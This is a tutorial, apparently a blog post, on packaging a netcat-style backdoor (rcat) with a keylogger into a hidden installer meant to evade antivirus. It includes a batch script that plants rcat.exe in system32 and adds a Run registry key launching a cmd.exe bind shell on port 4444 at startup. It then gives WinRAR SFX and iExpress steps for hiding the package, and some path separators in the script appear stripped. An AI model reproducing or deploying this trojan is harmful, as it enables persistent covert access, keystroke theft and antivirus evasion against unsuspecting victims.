This post is based on how to bypass Anti-Virus by using FUD (Fully Undetectable). There are many Crypters and binders but manually based is the best in the business. In Penetrating tests FUD Crypter is most important part for ethical hackers.Metasploit encoders can also be used to bypass antivirus but in this tutorial it is manually made FUD by using netcat as backdoor.
Rcat is can also be used though it is good replica of Netcat and got less chance to get detected. We use a technique to wrap/bind our Package file with it.
Follow the simple steps.
Below is the Code for Create a batch File. This will edit registry windows add your NetCat in System folder.
@echo off copy rcat.exe %systemroot%system32rcat.exe if errorlevel 0 goto regedit goto error :regedit reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v nc /d “%systemroot%system32rcat.exe -L -d -p 4444 -t -e cmd.exe” if errorlevel 0 goto ip :error echo something wrong with the program. goto end :ip echo write down the IP address from the table ipconfig :end echo end. nc -L -p 4444 -t
Now open notepad copy this code in it & save it with name .bat.
Download Rcat latest version. Copy rcat.exe in the same directory where this notepad named .bat exists.
Now we Use WinRAR to combine or BIND there two files (rcat.exe + Notpad).Click on ADD to archive
On the Next window that appear check Create SFX Archive. Go to Advance TAB & click SFX Options. Check out Options as i do
Go to MODES Tab and check on HIDE ALL. Click OK to create a Batch File.
New File will appear at Same Directory. So we have Combined these to files but to make it more we do as follows:
Start Panel>> cmd >> type = iexpress
Click NEXT, Leave it as Default.
Choose Package Title e.g TEST.
Leave as Default until Package FILE appears.
Now ADD those two files i.e 1st (.exe file that we made by above method ) &2nd (your Key-logger file )
iExpress will Combine them to make One File.
After Adding files, INSTALL Program to Launch will appear. On the Install Program select Simple Setup and on the Post Install Program select the Backdoor.
Select HIDDEN on the next window. On Finished message leave as default.
Package Name and Option Give the target path and check hidden file extracting process
On the next Window NO Restart and the Don’t SAVE in the last and Create Package.
Congratulations our Package has been created and it has the ability to Bypass most of the Antivirus.